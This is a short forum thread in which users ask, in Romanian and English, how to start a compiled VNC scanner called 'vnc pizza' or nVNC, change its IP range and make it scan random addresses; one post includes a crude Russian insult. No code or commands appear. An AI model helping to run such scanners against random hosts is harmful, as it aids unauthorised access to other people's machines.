marmota29 Posted August 16, 2015 Report Posted August 16, 2015 ba fratiori mei ma cac in el de vnc pizza lam compilat spunetimi si mie va rog comenzile la el cum il pornesc cum schimb clasa ip dupa ce lam compilat Quote
carartem03 Posted September 17, 2015 Report Posted September 17, 2015 what does nVNC do?Soset tvoi xyi Quote
htah Posted October 10, 2023 Report Posted October 10, 2023 Bro how can i make it rondom ips .. please Quote
